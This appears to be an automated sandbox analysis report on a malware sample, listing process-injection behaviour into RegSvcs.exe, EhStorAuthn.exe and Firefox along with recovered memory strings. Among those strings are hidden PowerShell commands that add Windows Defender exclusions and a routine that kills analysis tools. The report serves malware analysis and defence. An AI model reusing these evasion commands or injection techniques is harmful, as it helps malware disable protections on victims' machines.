            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\EhStorAuthn.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: NULL target: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: NULL target: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeThread register set: target process: 3744Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeThread APC queued: target process: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 4B8008Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: CB6000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DC1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,8_2_00DC1A91
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D63312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,8_2_00D63312
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")memstr_46b6a3c0-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for $objantivirusproduct in $colitemsmemstr_5e808945-1
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $usb = $objantivirusproduct.displaynamememstr_a99a67e3-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nextmemstr_8e59bb51-0
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return $usbmemstr_551639d4-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc ;==>antivirusmemstr_f7af9058-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func disabler()memstr_0f1d404f-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;if antivirus() = "windows defender" thenmemstr_bb2910f9-a
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;#requireadminmemstr_3fde7f0f-1
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " -command add-mppreference -exclusionpath " & @scriptdir, "", "", @sw_hide)memstr_d05659a0-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'", "", "", @sw_hide)memstr_fa0b1d8d-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbs'", "", "", @sw_hide)memstr_e2ddbd11-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbe'", "", "", @sw_hide)memstr_88da9f19-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbs'", "", "", @sw_hide)memstr_b9b22152-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbe'", "", "", @sw_hide)memstr_b801b1ea-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;endifmemstr_0e8ff7c8-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc ;==>disablermemstr_e89a32d9-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func antianalysis()memstr_6fc50f9b-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process explorer") thenmemstr_49c1cbfd-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winclose("process explorer")memstr_71345c1c-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("procexp64.exe")memstr_322ad7d4-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("procexp.exe")memstr_d9ea5b03-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process hacker") thenmemstr_23a7ad66-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winclose("process hacker")memstr_bd609eda-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("processhacker.exe")memstr_e49c138f-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x571zxu23j7r5801x342memstr_36bb6772-9
            Source: FS04dlvJrq.exe, 00000000.00000003.2150747760.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zu`zuccmemstr_ebfcf3f5-8
            Source: FS04dlvJrq.exe, 00000000.00000002.2313928019.00000000072AE000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 98w##memstr_08d28c0f-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zu`zuccmemstr_52d5bd8b-0
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tkf91tf3memstr_80b4bbb6-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q^i[_imemstr_c72a9c02-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _i|bimemstr_33afc1cc-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aiiai3_imemstr_ba660e83-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _ie`ik_iwbimemstr_43bf61c9-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @ppj!jmemstr_711fdcdd-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u<@ppj!jmemstr_dc916983-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: us9q4unmemstr_413982ce-0
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9{dtmemstr_c2172061-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i9{dtmemstr_41f904fd-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9{htmemstr_92cf23ad-a
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i9{htmemstr_38882acf-2
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wj!j j memstr_a90b528f-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4)mg;memstr_7338d589-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i9|$(memstr_b8b1f37a-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$,0pwmemstr_75097939-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9|$(tmemstr_ae19b35a-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$,pwmemstr_47128091-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$,pjmemstr_6d9e128f-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$\pwhlmemstr_ac9f9673-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t$ph+memstr_641c2b71-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$8+d$0jmemstr_a7c9ea80-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$<+d$4@pmemstr_c859fb38-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$<+d$4pmemstr_1727bac8-0
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |$ t"jmemstr_e29fb38e-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qqsvwmemstr_3923f653-9
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pppppmemstr_76a8004b-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$ pjmemstr_0bf1c885-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$ pjh3memstr_355cfa8c-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$ pjh2memstr_b5ea203e-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )mwqwmemstr_8294fc83-2
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 54)mh )mvmemstr_46148e97-1
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ivyi}yimemstr_affd182e-0
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #msvwtmemstr_2999037a-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$0vpsmemstr_07f1b5e3-0
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$8psmemstr_a9a9b346-1
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$4psmemstr_5c5c0c8b-2
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9t$$tmemstr_fdf0d576-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$4pjmemstr_f25194be-a
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |$$t@memstr_7fba0d0d-1
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$0psmemstr_7844dea9-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t)m;ememstr_7eec7e1e-f
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x)m;ememstr_015c3bfc-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *;5p)mmemstr_582aa2fa-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5p)m3memstr_408085c2-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^954)mmemstr_0a64fe3f-0
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f;54)mmemstr_d598392c-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )mjjj memstr_3985b7d2-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gvpppppmemstr_5a6ca50a-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: svjdjmemstr_07d52493-2
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d@mvsfmemstr_4e8aae24-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ppj pppmemstr_f7f065ac-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 954)mmemstr_493baf84-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 954)m|~memstr_126b28aa-1
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i_^[]memstr_a45d0ab9-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $svw3memstr_c6e14ffa-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =l)mtmemstr_3c90db6c-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tysvjmemstr_76b83b73-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =l)m^[tmemstr_ea92eb45-6
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$ pwmemstr_b18bb356-9
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$$pwmemstr_af8b98af-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $)mj,memstr_a2f81325-2
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$ x&memstr_ee896fff-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$(pjmemstr_34ed78fc-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t$l;t$memstr_d5025c02-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$hpvmemstr_eb56f398-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$\pwvmemstr_0bd04920-0
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;|$8}+memstr_4aae84b2-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i;|$8}+memstr_a21dac39-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$xpjmemstr_bd3c302e-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$xphmemstr_80a3643e-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g;|$<memstr_c653c150-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ig;|$<memstr_d849d0fe-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p3mspmemstr_2d82cd3b-e
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =`)mvmemstr_b2e0b76e-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +g<+w@memstr_501e99af-7
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$tpvh>memstr_a9c4e30a-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g4;g\memstr_1b5cd361-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$@pvhmemstr_7436f0e9-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$|pvhkmemstr_b856fc38-1
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$(pvhmemstr_dc16b372-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t$4jhmemstr_ea2bc676-c
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t$$vqmemstr_35c41249-3
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$0ft9memstr_e819e501-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u\pprjmemstr_f01cd08a-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <jjrjmemstr_ea9b04c4-5
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]jjrjmemstr_b30d60c5-d
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: djjrjmemstr_f365b16d-9
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {,9c0~[memstr_df176850-2
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c0_^[memstr_542bcbea-b
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j]xf;memstr_c9221fa9-4
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tj\xf;umemstr_c6053acb-8
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t*j[xmemstr_7e2594e6-2
            Source: FS04dlvJrq.exe, 00000000.00000003.2150658312.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @_^[]memstr_94a6ba46-2
